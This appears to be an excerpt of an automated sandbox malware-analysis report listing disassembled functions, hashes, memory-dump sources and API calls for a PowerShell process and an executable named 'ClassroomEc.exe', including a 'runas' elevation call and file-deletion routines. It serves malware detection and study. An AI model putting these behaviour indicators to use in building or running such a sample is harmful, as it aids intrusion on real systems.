Instruction Fuzzy Hash: CFF0ED74A017045FD764DFB9D49879ABBE9FB48350F00442DD54EC7340DB396981DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04D5787C Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c30b67b58292562871591926541b54d8eb42df8951f82e8eb058cc89b601da75
Instruction ID: df770fce03edc4800ecef02728aae8071ad9e89a5adbe9e833c80f3e5287c2cc
Opcode Fuzzy Hash: c30b67b58292562871591926541b54d8eb42df8951f82e8eb058cc89b601da75
Instruction Fuzzy Hash: 4EE0C9B4D4420E9FCF54DFA894452BEBFF4AB09200F6089AED85DE7340EA3466428F94

Uniqueness

Uniqueness Score: -1.00%

Function 04D5D3D8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fce4f16c4c770878bb63d2fa6cc164bd4f16b096b9c552468f2f6efa9405448
Instruction ID: 0606ceafb56793cb4726d5b81191d8544b64c7f84b5de1ba876da007d069afbf
Opcode Fuzzy Hash: 9fce4f16c4c770878bb63d2fa6cc164bd4f16b096b9c552468f2f6efa9405448
Instruction Fuzzy Hash: 39E02639304B145BCF093B79A01C2DE7A9AEBC8725F00002ED60AC7341CF79580197DA

Uniqueness

Uniqueness Score: -1.00%

Function 04D5FE50 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bddb52e99ba2573d8a41bba8279ab045539daac163de8403434993c5457d1ae
Instruction ID: 6cc4d110406a2421b064b711b6bde2c9ab8decedf81bd655e5469e002df4a8cd
Opcode Fuzzy Hash: 8bddb52e99ba2573d8a41bba8279ab045539daac163de8403434993c5457d1ae
Instruction Fuzzy Hash: 62E01274D042495E8751DFB889416ADFFF0EA09101B6481AEC958D7341E7325503DFE2

Uniqueness

Uniqueness Score: -1.00%

Function 04D5D198 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c326a90c377b6b0d16d763c96b8e39a81d4fe01be4bead2dc02e37105da30bec
Instruction ID: fc3b98aca36422e79eb613dd2030a8fd47c4b80d3157959b01a03e26baf9b30f
Opcode Fuzzy Hash: c326a90c377b6b0d16d763c96b8e39a81d4fe01be4bead2dc02e37105da30bec
Instruction Fuzzy Hash: 31E06D30801218DFCB08AB74E40A8AEBFB0EF09200B8041ACE84393261DA31154BCF82

Uniqueness

Uniqueness Score: -1.00%

Function 04D5DFA8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08dbdeae867c50f788d99710c5df7e4b0546286759a22f5e0f593294ee923f8e
Instruction ID: f004cf95537246d6c1e850492561b835491dedad74785b376a0356d2df235874
Opcode Fuzzy Hash: 08dbdeae867c50f788d99710c5df7e4b0546286759a22f5e0f593294ee923f8e
Instruction Fuzzy Hash: E7D05E1371026A071F1431AE580077EA6DFCAC58A67454077AE04E3361ED44EC0253B3

Uniqueness

Uniqueness Score: -1.00%

Function 04D5D260 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c088231a14c2261b9a07cf0009b8091f01d88e369e70ff48a5a7a9106a06d30f
Instruction ID: f7f867021d2a655dc413f50ce3e8085e636520df98eedd7f20ffd7364e77752a
Opcode Fuzzy Hash: c088231a14c2261b9a07cf0009b8091f01d88e369e70ff48a5a7a9106a06d30f
Instruction Fuzzy Hash: 97E01274A043099FC7149F64E54686FBFF8EB48201F40555DE946A3360DE30A581CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04D57888 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d99497917825566261cda27ee91053b3c856dfd16de5ed3c1080998ea1c573
Instruction ID: e80c27baf51170803de8f4f77e49cedffa93cf93ad619386a8ea2aeee7a59cbf
Opcode Fuzzy Hash: a2d99497917825566261cda27ee91053b3c856dfd16de5ed3c1080998ea1c573
Instruction Fuzzy Hash: C7E026B4E0420E9F8F48DFB995421BEFBF5AB49200F10856E9859E7340E63456118FE5

Uniqueness

Uniqueness Score: -1.00%

Function 04D5FE60 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 29108b2cbe0a46231c36847a1a22274e6644456e82d595321eddd75ed07faa02
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: DDD06270D0420D9F8780DFADC94156DFBF4EB48210F5085AE8919D7311F73196128BD1

Uniqueness

Uniqueness Score: -1.00%

Function 04D5D1A8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1232caae86bc236ad4942df2671f9673decdb437b66184d016340ebc13ed36f5
Instruction ID: 0c75145190969581d9276e0e715415aaeb2f77cfc58f614bbbb23e831312ba7e
Opcode Fuzzy Hash: 1232caae86bc236ad4942df2671f9673decdb437b66184d016340ebc13ed36f5
Instruction Fuzzy Hash: 3ED062319053198BCB08BB75D85A4BEBB74FB14201F80415DDD4753391AF20555ADBC1

Uniqueness

Uniqueness Score: -1.00%

Function 04D5D270 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680037d2eb45d0ec0ed3146bd87bfaa2d852bb971543e687d79930e7a2226907
Instruction ID: cf7dd321b36b85e4b7a974de59bc0469b75fd3721e5b53fca390118d8e009b8d
Opcode Fuzzy Hash: 680037d2eb45d0ec0ed3146bd87bfaa2d852bb971543e687d79930e7a2226907
Instruction Fuzzy Hash: F7D01774A043098BCB04EFA8E44686EBFF5EB48200F004168DA0A93390EE30A881CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 04D5C901 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5a80c1631f6348c4a69de19b94513d50fc500e60ae3f66c65722dcf711bcb76
Instruction ID: 7438950e87b82c80af036d2cc075579e174daee9b225d8aaef82c888a48aa698
Opcode Fuzzy Hash: a5a80c1631f6348c4a69de19b94513d50fc500e60ae3f66c65722dcf711bcb76
Instruction Fuzzy Hash: C4C08034408655AFE70201604D050917FE4BE821103CE00D54480DF013D61D3C91CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04D57848 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb23f39a30ac2134fd80832d6572db66fca23b60b7df6ba79a38ab071bdc41a
Instruction ID: 5926e94fab3fa5640a85b1267768a0db17f859a283997a0097f9c84bbcdabfd0
Opcode Fuzzy Hash: 2eb23f39a30ac2134fd80832d6572db66fca23b60b7df6ba79a38ab071bdc41a
Instruction Fuzzy Hash: 85C01230408308DADB104655D00D310BA94771160DFA880ADD55D0C1A2D673A8E5D651

Uniqueness

Uniqueness Score: -1.00%

Function 04D57858 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fa000ac4fd2f602615a26f465e878d18405041ce38739eaab301239c18be24f
Instruction ID: 65c9ca8033a1bfa107be70b9e46a7814509169005907a3498ef5cab183195b66
Opcode Fuzzy Hash: 6fa000ac4fd2f602615a26f465e878d18405041ce38739eaab301239c18be24f
Instruction Fuzzy Hash: FDC02B30C08344D7CF002392A00D320BF98F700200FC4004DE5690C1B7DF91F460D251

Uniqueness

Uniqueness Score: -1.00%

Function 04D5C3A0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffcf7623ef4dd44814c9831a144c682dc2988cc43f75f95b495c1a713caa78a5
Instruction ID: 83355fb1f14142f45749f2fd1f2d5ac9545009fec20931d9535b8c3654f19c04
Opcode Fuzzy Hash: ffcf7623ef4dd44814c9831a144c682dc2988cc43f75f95b495c1a713caa78a5
Instruction Fuzzy Hash: BFB092340443098FC3486F7AA408814B369EA4520938084EDE90F0BA969E36E855CA55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 07A9145E Relevance: 11.4, Strings: 9, Instructions: 194COMMON

Download Yara Rule

Strings

$]q, xrefs: 07A9170B
`Q]q, xrefs: 07A915A5
fbq, xrefs: 07A9155A
tP]q, xrefs: 07A915DF
$]q, xrefs: 07A914FC
$]q, xrefs: 07A916E1
`Q]q, xrefs: 07A9160B
$]q, xrefs: 07A9151D
$]q, xrefs: 07A91539

Memory Dump Source

Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd

Similarity

API ID:
String ID: fbq$`Q]q$`Q]q$tP]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-810355167
Opcode ID: 23bb62744c30f076da83648b744ef8a5cced117ea6febb956f34a412535b4131
Instruction ID: 59d1cd72b79a99c1cef0bc49976b960b5f906113f7dd9081a6c5cca4c596a7bd
Opcode Fuzzy Hash: 23bb62744c30f076da83648b744ef8a5cced117ea6febb956f34a412535b4131
Instruction Fuzzy Hash: 617189F4A0020FDBDF248F09C544BAAB7F5AB85315F598475E8229B290C734DCA1CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 07A93D40 Relevance: 10.3, Strings: 8, Instructions: 322COMMON

Download Yara Rule

Strings

$]q, xrefs: 07A93D52
$]q, xrefs: 07A94036
tP]q, xrefs: 07A93DBD
4']q, xrefs: 07A93F41
$]q, xrefs: 07A93D84
$]q, xrefs: 07A93D78
tP]q, xrefs: 07A93DC9
4']q, xrefs: 07A93F4D

Memory Dump Source

Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
API String ID: 0-1910532044
Opcode ID: 022b188755c588f9264e8381c3a74780a5ef675b205247835ef3af0892c2a63a
Instruction ID: b848ee982c52b1bf29d7286ddd0703e5d6eaa441a49fd53346de49edc4215ba7
Opcode Fuzzy Hash: 022b188755c588f9264e8381c3a74780a5ef675b205247835ef3af0892c2a63a
Instruction Fuzzy Hash: 70A145B27043069FDF249B69C810B2ABBF5AFC5710F14847AD465CB391DB32D861C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07A96020 Relevance: 7.9, Strings: 6, Instructions: 403COMMON

Download Yara Rule

Strings

4']q, xrefs: 07A96155
4']q, xrefs: 07A96485
4']q, xrefs: 07A96491
4']q, xrefs: 07A9615F
4']q, xrefs: 07A96330
4']q, xrefs: 07A96326

Memory Dump Source

Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q
API String ID: 0-471056614
Opcode ID: 238615835cf380bdff6b2bc2c9f1261c19570240e67add1431fbd360ba225f80
Instruction ID: 5f7d537715a728b4772de8bd765c40e3b7dd40b0a1dfd9f96baedc01312efcc2
Opcode Fuzzy Hash: 238615835cf380bdff6b2bc2c9f1261c19570240e67add1431fbd360ba225f80
Instruction Fuzzy Hash: 00D107F1B04216CFDF249B6C881066BBBF1AFC5210F28847AD925CB355DB31D8A2C792

Uniqueness

Uniqueness Score: -1.00%

Function 07A90940 Relevance: 6.7, Strings: 5, Instructions: 489COMMON

Download Yara Rule

Strings

4']q, xrefs: 07A90AAE
4']q, xrefs: 07A90AA4
4']q, xrefs: 07A90E26
fbq, xrefs: 07A90E03
4']q, xrefs: 07A90E1A

Memory Dump Source

Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd

Similarity

API ID:
String ID: fbq$4']q$4']q$4']q$4']q
API String ID: 0-2283484764
Opcode ID: f38d04ae353314ef74a6dbef7b2c43f0a7e7ee82eced032ed4013abf35d605aa
Instruction ID: eaeb10197fc0f39eff07128b38026056e35b0955268bae1ad9a43c672a55761d
Opcode Fuzzy Hash: f38d04ae353314ef74a6dbef7b2c43f0a7e7ee82eced032ed4013abf35d605aa
Instruction Fuzzy Hash: 16F123B5B00316CFDB149BA8841076BBBE2AFD6350F14807AD569CB341DA31D8A2C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 04D5C490 Relevance: 5.2, Strings: 4, Instructions: 234COMMON

Download Yara Rule

Strings

`^q, xrefs: 04D5C602
`^q, xrefs: 04D5C6A4
`^q, xrefs: 04D5C583
`^q, xrefs: 04D5C722

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID: `^q$`^q$`^q$`^q
API String ID: 0-4294711580
Opcode ID: 856694ad7ff57c904f0253f0202cd8f49e7361a322682b1ad1c60a8a73851cbe
Instruction ID: fa6464942321e22c1eeece0fd236478ade45efb4069a7324dc3dc5de3fc95825
Opcode Fuzzy Hash: 856694ad7ff57c904f0253f0202cd8f49e7361a322682b1ad1c60a8a73851cbe
Instruction Fuzzy Hash: ACB17774E012099FDB54DFA9D590A9DFBF2FF48304F20862AE819AB314DB34A955CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07A95BB0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 07A95BC2
$]q, xrefs: 07A95C18
$]q, xrefs: 07A95C0C
$]q, xrefs: 07A95BDE

Memory Dump Source

Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: ad65f70e9823f80269aad5367a9216ef918c4183d5c67ddd885562bc09fddc67
Instruction ID: ae61e156dbcd3de9c25d720eb9e579bb0388b53be13302e5927a083d7412c154
Opcode Fuzzy Hash: ad65f70e9823f80269aad5367a9216ef918c4183d5c67ddd885562bc09fddc67
Instruction Fuzzy Hash: 192147F1B103165BDF395A6E8882B26A7EA9BC0715F64843AD555CB3C1DD31C871C372

Uniqueness

Uniqueness Score: -1.00%

Function 07A90518 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

4']q, xrefs: 07A9058F
$]q, xrefs: 07A90562
$]q, xrefs: 07A9056E
4']q, xrefs: 07A90583

Memory Dump Source

Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: 75f776cb0735de2755c4276c49863dc23086e140ad070ab1a9c4c7fbc035149e
Instruction ID: 873c8e165d7c177bc8a7263ed0d0207e48a39a4346a73bba74f42b785a3bae2b
Opcode Fuzzy Hash: 75f776cb0735de2755c4276c49863dc23086e140ad070ab1a9c4c7fbc035149e
Instruction Fuzzy Hash: 560126B17093475FEB3A162C182012A6FF65FC3A507268567D490CB296CD158C5283A2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ClassroomEc.exePID: 8148, Parent PID: 4408COMMON

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	77

Executed Functions

Function 00A75E70 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00A75EC8
wsprintfW.USER32 ref: 00A75EDE
GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00A75EEF
GetLastError.KERNEL32 ref: 00A75EF8
??2@YAPAXI@Z.MSVCRT ref: 00A75F1D
GetEnvironmentVariableW.KERNEL32(?,?,00A7B311), ref: 00A75F43
GetLastError.KERNEL32 ref: 00A75F52
lstrcmpiW.KERNEL32(00000000,?), ref: 00A75F80
??3@YAXPAX@Z.MSVCRT ref: 00A75FA3
??3@YAXPAX@Z.MSVCRT ref: 00A75FCC
??3@YAXPAX@Z.MSVCRT ref: 00A75FF7
SetLastError.KERNEL32(?), ref: 00A76003
lstrlenA.KERNEL32(?), ref: 00A76067
??2@YAPAXI@Z.MSVCRT ref: 00A7608A
GetLocaleInfoW.KERNELBASE(00000000,00001004,?,0000001F), ref: 00A760D3
_wtol.MSVCRT(?), ref: 00A760E4
MultiByteToWideChar.KERNEL32(000004E4,00000000,?,?,00000000,?), ref: 00A76117

Part of subcall function 00A75E00: GetUserDefaultUILanguage.KERNEL32(?,00A7604C), ref: 00A75E0E

Strings

SfxString%d, xrefs: 00A75ED5

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ErrorLast$??3@$??2@EnvironmentVariable$ByteCharDefaultInfoLanguageLocaleMultiUserWide_wtollstrcmpilstrlenwsprintf
String ID: SfxString%d
API String ID: 1359506875-944934635
Opcode ID: cc84bb2f5a1a85b511b0dbcdae4c9d25a77c148f5816da6e491c12d728bbfa71
Instruction ID: 14b6943c9370448a825e850fbbc0fb32b73aa99c1a9a779a20feaae5f5b71208
Opcode Fuzzy Hash: cc84bb2f5a1a85b511b0dbcdae4c9d25a77c148f5816da6e491c12d728bbfa71
Instruction Fuzzy Hash: A58108B0E00214DFEB14CBA8CC89BAEB7B5BB44304F14866DE50EAB255D731AD86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A74ED0 Relevance: 18.1, APIs: 12, Instructions: 113
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00A74EE0

Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E

FindFirstFileW.KERNELBASE(00000000,?,00A99854,00A750E8), ref: 00A74F02
_DebugHeapAllocator.LIBCPMTD ref: 00A74F1C
lstrcmpW.KERNEL32(?,00A99850,?,0000005C,00A750E8), ref: 00A74F51
lstrcmpW.KERNEL32(?,00A99848), ref: 00A74F67
SetFileAttributesW.KERNELBASE(00000000,00000000,?,0000005C,00A750E8), ref: 00A74FB0
DeleteFileW.KERNELBASE(00000000), ref: 00A74FC3
FindNextFileW.KERNELBASE(000000FF,?), ref: 00A74FF5
FindClose.KERNEL32(000000FF), ref: 00A75007
SetCurrentDirectoryW.KERNEL32(00000000), ref: 00A75018
SetFileAttributesW.KERNEL32(00A750E8,00000000), ref: 00A75024
RemoveDirectoryW.KERNEL32(00A750E8), ref: 00A75032

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: File$Find$AllocatorAttributesDebugDirectoryHeaplstrcmp$CloseCurrentDeleteFirstNextRemove_wmemmove
String ID:
API String ID: 430740293-0
Opcode ID: 9aea604fa9aab57ba9fc1f132933ea125c96cb20226a50d9518612fcd101ebc7
Instruction ID: a109d847d225b80cf64797023e54fe13bdf990cd1c3512e1175a5ff7f2e74858
Opcode Fuzzy Hash: 9aea604fa9aab57ba9fc1f132933ea125c96cb20226a50d9518612fcd101ebc7
Instruction Fuzzy Hash: 4F414270E04208ABDB14EFA4DD99BEF7778AF14704F54C69CE41E92091EF70AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A71E40 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00A71E5E
_DebugHeapAllocator.LIBCPMTD ref: 00A71ED4
ShellExecuteExW.SHELL32(0000003C), ref: 00A71F1B
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A71F36
CloseHandle.KERNEL32(?), ref: 00A71F40

Strings

runas, xrefs: 00A71EA3
<, xrefs: 00A71E66

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorCloseDebugExecuteHandleHeapObjectShellSingleWaitmemset
String ID: <$runas
API String ID: 46794241-1187129395
Opcode ID: dc939fa32619dc5b321c6ae1b0482197c9e3eb04a3b7114bf7c3e51907217a16
Instruction ID: 5db5bbd190106ef475f51cd7367e4da6d90e78293b397619ad34717ad5bc8998
Opcode Fuzzy Hash: dc939fa32619dc5b321c6ae1b0482197c9e3eb04a3b7114bf7c3e51907217a16
Instruction Fuzzy Hash: 77311770D102099BCB04EFD8DC96BEEBBB8FF14300F10C119E519AB295EB74AA55CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A74C30 Relevance: 7.7, APIs: 5, Instructions: 211
memorystringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00A72B43,00000000,00000000,?), ref: 00A74C3A
_DebugHeapAllocator.LIBCPMTD ref: 00A74C4A

Part of subcall function 00A735B0: _DebugHeapAllocator.LIBCPMTD ref: 00A735C0
Part of subcall function 00A735B0: wcsncpy.MSVCRT ref: 00A735E4

GetSystemTimeAsFileTime.KERNEL32(00A72B43,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00A72B43,00000000), ref: 00A74D72
GetFileAttributesW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,00A72B43,00000000,00000000,?), ref: 00A74D7C

Part of subcall function 00A7B300: wvsprintfW.USER32(?,?,?), ref: 00A7B32D
Part of subcall function 00A7B300: GetLastError.KERNEL32 ref: 00A7B33D
Part of subcall function 00A7B300: FormatMessageW.KERNEL32(00001100,00000000,?,?,?,00000000,00000000), ref: 00A7B36C
Part of subcall function 00A7B300: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 00A7B393
Part of subcall function 00A7B300: lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00A7B3A8
Part of subcall function 00A7B300: lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00A7B3BB
Part of subcall function 00A7B300: ??2@YAPAXI@Z.MSVCRT ref: 00A7B3DC
Part of subcall function 00A7B300: lstrcpyW.KERNEL32(?,?), ref: 00A7B404
Part of subcall function 00A7B300: lstrcpyW.KERNEL32(?,?), ref: 00A7B437
Part of subcall function 00A7B300: ??3@YAXPAX@Z.MSVCRT ref: 00A7B45F
Part of subcall function 00A7B300: LocalFree.KERNEL32(?), ref: 00A7B46E

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: lstrlen$AllocatorDebugFileFormatHeapMessageTimelstrcpy$??2@??3@AttributesErrorFreeLastLocalSystemwcsncpywvsprintf
String ID:
API String ID: 1540793163-0
Opcode ID: 16deb58c9d469825eb4cb415fe829ff0b6a9bcc8eb8fbfb6fc1ad9e5b909af72
Instruction ID: c0a217c7df9bdab20d0650bd961437d8753cc673224bd8a9827798cb2def109f
Opcode Fuzzy Hash: 16deb58c9d469825eb4cb415fe829ff0b6a9bcc8eb8fbfb6fc1ad9e5b909af72
Instruction Fuzzy Hash: AD815E74A00219DBDF14DF98DD91AFEB3B5BF48300F10C558E809AB251EB74AE51DB91

Uniqueness

Uniqueness Score: -1.00%

